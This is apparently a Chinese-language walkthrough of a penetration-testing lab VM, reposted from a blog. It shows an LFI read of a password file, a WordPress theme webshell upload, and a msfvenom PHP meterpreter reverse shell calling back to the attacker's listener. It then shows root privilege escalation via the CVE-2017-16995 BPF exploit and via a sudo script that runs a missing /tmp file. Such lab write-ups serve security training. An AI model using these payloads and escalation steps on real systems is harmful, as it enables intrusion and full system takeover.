    guest-uw1hdg@ubuntu:~/Desktop$ ./a.out 
    [.] 
    [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
    [.] 
    [.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
    [.] 
    [*] creating bpf map
    [*] sneaking evil bpf past the verifier
    [*] creating socketpair()
    [*] attaching bpf backdoor to socket
    [*] skbuff => ffff955bf2847500
    [*] Leaking sock struct from ffff955bef6a6c00
    [*] Sock->sk_rcvtimeo at offset 592
    [*] Cred structure at ffff955bf0c7e0c0
    [*] UID from cred structure: 999, matches the current: 999
    [*] hammering cred structure at ffff955bf0c7e0c0
    [*] credentials patched, launching shell...
    # id
    uid=0(root) gid=0(root) groups=0(root),999(guest-uw1hdg)
    #
    

    走正常流程

    • 目标是拿到saket用户目录的password.txt文件。尝试http://192.168.116.132/image.php?secrettier360=/home/saket/password.txt,得到密码为:follow_the_ippsec
    ➜  ~ curl http://192.168.116.132/image.php?secrettier360=/home/saket/password.txt  
    <html>
    <title>HacknPentest</title>
    <body>
     <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
    </body>
    finaly you got the right parameter<br><br><br><br>follow_the_ippsec
    </html>
    ➜  ~
    
    • 在WordPress的文章里找作者的用户名,就只有一篇文章,作者是victor,账号密码登录,所以在WordPress中要设置作者的别名,不会被别人猜出来登录账号。
    • 进入后台上传木马,这些就不用说了。各种各样的方法,修改主题。
    ➜  ~ msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.116.1 LPORT=7788 -o shell.php 
    [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
    [-] No arch selected, selecting arch: php from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 30656 bytes
    Saved as: shell.php
    
    msf5 > use exploit/m
    Display all 313 possibilities? (y or n)
    msf5 > use exploit/multi/handler 
    msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp 
    payload => php/meterpreter_reverse_tcp
    msf5 exploit(multi/handler) > set lport 7788
    lport => 7788
    msf5 exploit(multi/handler) > set lhost 192.168.116.1
    lhost => 192.168.116.1
    msf5 exploit(multi/handler) > run 
    
    [*] Started reverse TCP handler on 192.168.116.1:7788 
    [*] Meterpreter session 1 opened (192.168.116.1:7788 -> 192.168.116.132:43802) at 2019-09-20 11:31:27 +0800
    
    • 交互终端:python -c ‘import pty;pty.spawn(“/bin/bash”)’
    www-data@ubuntu:/home/saket$ uname -a	
    uname -a
    Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
    www-data@ubuntu:/home/saket$
    
    • CVE-2017-16995提权,https://github.com/SecWiki/linux-kernel-exploits/tree/master/2017/CVE-2017-16995
    • 上传到服务器然后gcc编译执行就可以拿到Root权限了。
    • 或者用msf自带的
    msf5 exploit(multi/handler) > use exploit/linux/local/bpf_sign_extension_priv_esc
    msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set session 1
    msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set lhost 192.168.116.1
    lhost => 192.168.116.1
    msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > run 
    [!] SESSION may not be compatible with this module.
    [*] Started reverse TCP handler on 192.168.116.1:4444 
    [*] Writing '/tmp/.Glz23KY6oY.c' (10867 bytes) ...
    [*] Writing '/tmp/.UaPN30M' (207 bytes) ...
    [*] Launching exploit ...
    [*] Sending stage (985320 bytes) to 192.168.116.132
    [*] Meterpreter session 2 opened (192.168.116.1:4444 -> 192.168.116.132:48326) at 2019-09-20 12:40:28 +0800
    meterpreter > sysinfo 
    Computer     : 192.168.116.132
    OS           : Ubuntu 16.04 (Linux 4.10.0-28-generic)
    Architecture : x64
    BuildTuple   : i486-linux-musl
    Meterpreter  : x86/linux
    meterpreter > shell 
    Process 2362 created.
    Channel 1 created.
    id
    uid=0(root) gid=0(root) groups=0(root),33(www-data)
    

    非EXP提权

    其实saket目录下有一个enc的执行文件,执行后输入上面找到的backup_pass的密码,复制了两个文件到saket的home目录,拿到enc.txt和key.txt。

    www-data@ubuntu:/home/saket$ ./enc
    ./enc
    enter password: backup_password
    backup_password
    good
    /bin/cp: cannot stat '/root/enc.txt': Permission denied
    /bin/cp: cannot stat '/root/key.txt': Permission denied
    www-data@ubuntu:/home/saket$ whoami
    whoami
    www-data
    www-data@ubuntu:/home/saket$ sudo ./enc
    sudo ./enc
    enter password: backup_password
    backup_password
    good
    www-data@ubuntu:/home/saket$ ls
    ls
    enc  enc.txt  key.txt  password.txt  user.txt
    www-data@ubuntu:/home/saket$
    
    • 解密后base64解码后得到saket的密码为tribute_to_ippsec
    ➜  ~ echo "RG9udCB3b3JyeSBzYWtldCBvbmUgZGF5IHdlIHdpbGwgcmVhY2ggdG8Kb3VyIGRlc3RpbmF0aW9uIHZlcnkgc29vbi4gQW5kIGlmIHlvdSBmb3JnZXQgCnlvdXIgdXNlcm5hbWUgdGhlbiB1c2UgeW91ciBvbGQgcGFzc3dvcmQKPT0+ICJ0cmlidXRlX3RvX2lwcHNlYyIKClZpY3Rvciw="|base64 -d
    Dont worry saket one day we will reach to
    our destination very soon. And if you forget 
    your username then use your old password
    ==> "tribute_to_ippsec"
    
    Victor,%
    
    • 切换到saket用户
    www-data@ubuntu:/home/saket$ su saket
    su saket
    Password: tribute_to_ippsec
    
    saket@ubuntu:~$   
    saket@ubuntu:~$ sudo -l
    sudo -l
    Matching Defaults entries for saket on ubuntu:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
    
    User saket may run the following commands on ubuntu:
        (root) NOPASSWD: /home/victor/undefeated_victor
    saket@ubuntu:~$
    
    • 发现/home/victor/undefeated_victor不用密码
    saket@ubuntu:~$ sudo /home/victor/undefeated_victor
    sudo /home/victor/undefeated_victor
    if you can defeat me then challenge me in front of you
    /home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
    saket@ubuntu:~$
    
    • 没有/tmp/challenge这个文件,把bash拷贝到/tmp/challenge就可以以victor的权限命令执行了。
    saket@ubuntu:~$ pwd
    pwd
    /home/saket
    saket@ubuntu:~$ cp /bin/bash /tmp/challenge
    cp /bin/bash /tmp/challenge
    saket@ubuntu:~$ sudo /home/victor/undefeated_victor
    sudo /home/victor/undefeated_victor
    if you can defeat me then challenge me in front of you
    root@ubuntu:~# id
    id
    uid=0(root) gid=0(root) groups=0(root)
    root@ubuntu:~#
    
  • 相关阅读:
    各项硬件使用剖析(一)---让你一眼就能区分瓶颈是Memory、processor ORdisk!
    基本算术运算符
    网页计算器 && 简易网页时钟 && 倒计时时钟
    页面加载后累加,自加1&&判断数字是否为两位数
    累加按钮,自加1&&输入两个数字,比较大小
    用typeof查看数据类型&&用parseInt解析数字,并求和
    鼠标移过,改变图片路径
    单一按钮显示/隐藏&&提示框效果
    简易选项卡&&简易JS年历
    函数传参,改变Div任意属性的值&&图片列表:鼠标移入/移出改变图片透明度
  • 原文地址:https://www.cnblogs.com/Kali-Team/p/12212368.html
Copyright © 2020-2023  润新知